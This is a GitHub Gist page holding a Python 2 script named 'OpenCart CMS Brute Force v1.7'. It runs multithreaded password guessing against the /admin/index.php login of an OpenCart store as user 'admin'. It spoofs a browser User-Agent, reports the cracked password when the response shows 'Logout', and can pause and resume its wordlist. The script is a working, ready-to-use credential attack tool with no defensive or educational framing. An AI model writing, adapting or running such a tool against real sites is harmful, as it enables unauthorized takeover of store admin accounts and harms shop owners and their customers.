Last active
March 2, 2021 22:36
-
-
Save yorickdewid/e34454ea902ec3d79624a64b885bf86d to your computer and use it in GitHub Desktop.
OpenCart bruteforce
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from __future__ import division | |
| import urllib | |
| import urllib2 | |
| import cookielib | |
| import threading | |
| import os | |
| import sys | |
| import time | |
| import signal | |
| def cls(): | |
| if os.name == "nt": | |
| os.system('cls') | |
| else: | |
| os.system('clear') | |
| cls() | |
| demo = ''' | |
| \t\t------------------------------------------------------- | |
| \t\t| OpenCart CMS Brute Force v1.7 | |
| \t\t| Use: python script.py <URL> <PASSWORDLIST> | |
| \t\t------------------------------------------------------- | |
| ''' | |
| print demo | |
| print "" | |
| site = sys.argv[1] | |
| pa = sys.argv[2] | |
| if site.startswith("http://"): | |
| site = site.replace("http://", "") | |
| elif site.startswith("https://"): | |
| site = site.replace("https://", "") | |
| else: | |
| pass | |
| def opencart(coder,passwd): | |
| try: | |
| t1 = time.time() | |
| agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} | |
| post = {} | |
| post['username'] = "admin" | |
| post['password'] = passwd | |
| url = "http://"+site+"/admin/index.php" | |
| data = urllib2.Request(url, urllib.urlencode(post), headers=agent) | |
| box = coder.open(data).read() | |
| if 'Logout' in box: | |
| t2 = time.time() | |
| print "-" * 30 | |
| print "| Domain: " + site | |
| print "| UserName: " + "admin" | |
| print "| Password: " + passwd | |
| print "| Time: " + str(t2-t1) | |
| print "-" * 30 | |
| print "" | |
| os._exit(1) | |
| else: | |
| print "[" + str(threading.active_count()) + "] Trying ... " + passwd | |
| except urllib2.URLError, err: | |
| time.sleep(1) | |
| opencart(coder,passwd) | |
| except Exception, e: | |
| print e | |
| thread = [] | |
| run = True | |
| can_continue = False | |
| last_word = "" | |
| def signal_handler(signal, frame): | |
| print "Terminating ...\nWaiting on threads ..." | |
| run = False | |
| for j in thread: | |
| j.join() | |
| print "Saving state at " + last_word | |
| f = open(".savestate" + pa,"w") | |
| f.write(last_word) | |
| f.close() | |
| os._exit(1) | |
| neo = cookielib.CookieJar() | |
| coder = urllib2.build_opener(urllib2.HTTPCookieProcessor(neo)) | |
| signal.signal(signal.SIGINT, signal_handler) | |
| if os.path.isfile(".savestate" + pa): | |
| with open(".savestate" + pa, "r") as f: | |
| current_password = f.read() | |
| print "Continue at " + current_password | |
| else: | |
| can_continue = True | |
| with open(pa, 'r') as f: | |
| password = f.read().splitlines() | |
| numlines = sum(1 for passwd in password) | |
| for idx,passwd in enumerate(password): | |
| if not run: | |
| break; | |
| if not can_continue: | |
| try: | |
| if current_password == passwd: | |
| can_continue = True | |
| else: | |
| continue | |
| except NameError: | |
| can_continue = True | |
| if idx % 50 == 0: | |
| print "Process at " + str(round((idx / numlines)*100)) + "%" | |
| if threading.active_count() > 80: | |
| time.sleep(1.5) | |
| if threading.active_count() > 100: | |
| time.sleep(3) | |
| if threading.active_count() > 125: | |
| time.sleep(5) | |
| last_word = passwd | |
| t = threading.Thread(target=opencart, args=(coder,passwd)) | |
| t.start() | |
| thread.append(t) | |
| time.sleep(0.1) | |
| if os.path.isfile(".savestate" + pa): | |
| os.remove(".savestate" + pa) | |
| for j in thread: | |
| j.join() | |
| print "Done\nWaiting on threads ..." |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment